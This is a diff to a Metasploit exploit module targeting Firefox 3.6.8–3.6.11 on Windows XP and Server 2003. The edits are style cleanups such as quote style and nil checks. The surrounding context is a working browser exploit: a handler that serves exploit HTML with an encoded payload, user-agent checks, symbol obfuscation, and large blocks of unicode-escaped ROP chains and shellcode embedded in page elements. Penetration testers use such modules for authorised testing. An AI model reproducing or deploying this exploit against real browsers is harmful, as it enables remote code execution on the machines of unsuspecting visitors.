@@ -47,20 +47,19 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DefaultOptions' => {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
         'Payload' => {
           'Space' => 1024,
-          'BadChars' => "",
+          'BadChars' => ''
         },
-        'Platform' => %w{win},
         'Targets' => [
           # Tested against Firefox 3.6.8, 3.6.9, 3.6.10, and 3.6.11 on WinXP and Windows Server 2003
           [
             'Firefox 3.6.8 - 3.6.11, Windows XP/Windows Server 2003',
             {
               'Platform' => 'win',
-              'Arch' => ARCH_X86,
+              'Arch' => ARCH_X86
             }
           ],
         ],
@@ -81,11 +80,11 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def on_request_uri(cli, request)
+  def on_request_uri(cli, _request)
     # Re-generate the payload
-    return if ((p = regenerate_payload(cli)) == nil)
+    return if ((p = regenerate_payload(cli)).nil?)
 
-    print_status("Sending exploit HTML...")
+    print_status('Sending exploit HTML...')
     send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
 
     # Handle the payload
@@ -95,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def generate_html(payload)
     enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
 
-    custom_js = %Q|
+    custom_js = %|
 function check(){
   var temp="";
   var user=navigator.userAgent.toLowerCase();
@@ -263,11 +262,11 @@ else {
     if datastore['OBFUSCATE']
       opts = {
         'Symbols' => {
-          'Variables' => %w{
+          'Variables' => %w[
             atts temp vara varb varc vard vare varf argsu beastk nop tags retaddr
             ropstr lefthalf bk sunb shellcodes sun8inner sun9inner sun10inner sun11inner array chk
-          },
-          'Methods' => %w{getatts code check dedede}
+          ],
+          'Methods' => %w[getatts code check dedede]
         }
       }
 
@@ -282,7 +281,7 @@ else {
       <div id=sun9>u2794u1000uc288u1082u3e38u1000u6cd4u100bu1016u1000u0000u0000u1000u0000u1000u0000u0040u0000uce22u1003u9090u0FEBu9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003u5B58u1889u9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003uFB83u74FFu9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003u830Bu04C0u9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003uF3EBuE890u9602u1001uc563u1000uc563u1000uc563u1000uc563u1000uce22u1003uFFECuFFFFu9602u1001u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u4c0eu1006u6cd4u100b</div>
       <div id=sun10>uB8B7u1029uB8B7u1029uB8B7u1029uB8B7u1029uB8B7u1029uB8B7u1029u20F0u1011u2288u1082u428au1000u7676u1016ub8b7u1029u0000u0000u1000u0000u1000u0000u0040u0000u9405u1003u9090u0FEBuE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003u5B58u1889uE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003uFB83u74FFuE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003u830Bu04C0uE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003uF3EBuE890uE541u1001u0583u1001u0583u1001u0583u1001u0583u1001u9405u1003uFFECuFFFFuE541u1001u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u65a0u1006u7676u1016</div>
       <div id=sun11>u4bc8u1000u4bc8u1000u4bc8u1000u4bc8u1000u4bc8u1000u4bc8u1000u83cau1000u0280u1083u3b5au1000u8ef4u100au4bc8u1000u0000u0000u1000u0000u1000u0000u0040u0000u11a1u1000u9090u0FEBu3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000u5B58u1889u3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000uFB83u74FFu3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000u830Bu04C0u3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000uF3EBuE890u3500u1007u25dfu1000u25dfu1000u25dfu1000u25dfu1000u11a1u1000uFFECuFFFFu3500u1007u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u647eu1006u8ef4u100a</div>
-      <div id=suv>#{enc_code.split("%").join}uffffuffffuffffuffff</div>
+      <div id=suv>#{enc_code.split('%').join}uffffuffffuffffuffff</div>
       </div>
       <body>
       <script type="text/javascript">
